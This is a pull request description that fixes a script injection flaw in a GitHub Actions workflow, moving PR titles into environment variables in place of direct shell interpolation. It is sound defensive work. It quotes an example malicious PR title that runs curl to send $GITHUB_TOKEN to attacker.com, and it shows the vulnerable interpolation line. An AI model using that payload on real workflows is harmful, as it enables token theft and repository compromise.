Fix script injection vulnerability in cross-repo-issue workflow

[jun06t]

Summary

• Fix script injection vulnerability in .github/workflows/cross-repo-issue.yml
• Pass user-controlled inputs (PR_TITLE, PR_NUMBER, PR_MERGED_AT) via environment variables instead of direct interpolation
• Prevents potential exfiltration of GITHUB_TOKEN through malicious PR titles

Background

The workflow was vulnerable to script injection because github.event.pull_request.title was directly interpolated into the shell command. An attacker could craft a malicious PR title like:

"; curl -X POST -d "token=$GITHUB_TOKEN" https://attacker.com/steal #

This would execute arbitrary commands and potentially exfiltrate the GitHub App token.

Fix

Changed from direct interpolation:

--title "Port PR from PBS-Go: ${{ github.event.pull_request.title }}"

To environment variable approach:

env:
  PR_TITLE: ${{ github.event.pull_request.title }}
run: |
  gh issue create --title "Port PR from PBS-Go: ${PR_TITLE}"

Reference

• GitHub Docs: Security hardening for GitHub Actions - Understanding the risk of script injections

Test Plan

• Verify the workflow still creates issues correctly when PRs are merged
• Confirm that malicious PR titles are now treated as literal strings